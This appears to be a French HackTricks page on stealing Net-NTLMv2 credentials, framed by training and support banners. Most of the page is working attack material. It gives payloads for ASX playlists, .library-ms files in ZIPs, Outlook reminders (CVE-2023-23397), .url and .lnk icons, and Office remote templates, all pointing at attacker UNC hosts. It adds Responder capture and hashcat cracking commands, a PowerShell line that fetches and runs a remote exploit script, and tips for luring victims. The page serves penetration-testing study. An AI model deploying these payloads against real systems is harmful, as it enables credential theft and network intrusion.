Endroits pour voler NTLM creds
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.
Consultez toutes les excellentes idées de https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — du téléchargement d’un fichier Microsoft Word en ligne à la ntlm leaks source : https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md et https://github.com/p0dalirius/windows-coerced-authentication-methods
Windows Media Player playlists (.ASX/.WAX)
Si vous parvenez à faire ouvrir ou prévisualiser à une cible une Windows Media Player playlist que vous contrôlez, vous pouvez leak Net‑NTLMv2 en pointant l’entrée vers un chemin UNC. WMP tentera de récupérer le média référencé via SMB et s’authentifiera implicitement.
Exemple de payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Flux de collecte et de cracking:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer gère de manière non sécurisée les fichiers .library-ms lorsqu’ils sont ouverts directement à partir d’une archive ZIP. Si la définition de la bibliothèque pointe vers un chemin UNC distant (par ex., \attacker\share), le simple fait de parcourir/lancer le .library-ms à l’intérieur du ZIP amène Explorer à énumérer le UNC et à émettre une authentification NTLM vers l’attaquant. Cela génère un NetNTLMv2 qui peut être cracked hors ligne ou potentiellement relayed.
Exemple minimal de .library-ms pointant vers un UNC contrôlé par l’attaquant
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Étapes opérationnelles
- Créez le fichier .library-ms avec le XML ci‑dessus (définissez votre IP/nom d’hôte).
- Zippez-le (sur Windows : Send to → Compressed (zipped) folder) et livrez le ZIP à la cible.
- Lancez un NTLM capture listener et attendez que la victime ouvre le .library-ms depuis l’intérieur du ZIP.
Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak
Microsoft Outlook for Windows traitait la propriété MAPI étendue PidLidReminderFileParameter dans les éléments de calendrier. Si cette propriété pointe vers un chemin UNC (p. ex., \attacker\share\alert.wav), Outlook contacterait le partage SMB lorsque le rappel se déclenche, provoquant le leak du Net‑NTLMv2 de l’utilisateur sans aucun clic. Cela a été corrigé le 14 mars 2023, mais c’est toujours très pertinent pour les flottes legacy/non mises à jour et pour l’analyse d’incidents historiques.
Exploitation rapide avec PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Côté Listener:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Remarques
- Une victime a seulement besoin d’avoir Outlook for Windows en cours d’exécution lorsque le rappel se déclenche.
- Le leak fournit Net‑NTLMv2, adapté à l’offline cracking ou au relay (pas pass‑the‑hash).
.LNK/.URL basé sur l’icône zero‑click NTLM leak (CVE‑2025‑50154 – contournement de CVE‑2025‑24054)
Windows Explorer affiche automatiquement les icônes des raccourcis. Des recherches récentes ont montré que, même après le patch d’avril 2025 de Microsoft pour les raccourcis d’icônes UNC, il était toujours possible de déclencher une authentification NTLM sans clics en hébergeant la cible du raccourci sur un chemin UNC et en laissant l’icône locale (contournement du patch attribué CVE‑2025‑50154). La simple visualisation du dossier amène Explorer à récupérer les métadonnées de la cible distante, envoyant NTLM vers le serveur SMB de l’attaquant.
Payload minimal Internet Shortcut (.url) :
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Payload de raccourci de programme (.lnk) via PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Idées de livraison
- Placez le raccourci dans une archive ZIP et incitez la victime à la parcourir.
- Placez le raccourci sur un partage accessible en écriture que la victime ouvrira.
- Combinez avec d’autres fichiers d’appât dans le même dossier pour que Explorer prévisualise les éléments.
Office remote template injection (.docx/.dotm) pour forcer NTLM
Les documents Office peuvent référencer un template externe. Si vous définissez le template joint sur un chemin UNC, l’ouverture du document s’authentifiera auprès de SMB.
Modifications minimales des relations DOCX (à l’intérieur de word/):
- Éditez word/settings.xml et ajoutez la référence au template joint :
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Éditez word/_rels/settings.xml.rels et pointez rId1337 vers votre UNC :
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Repaqueter en .docx et livrer. Lancez votre listener de capture SMB et attendez l’ouverture.
Pour des idées post-capture sur le relaying ou l’abus de NTLM, consultez :
Références
- HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
- HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
- Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.
HackTricks

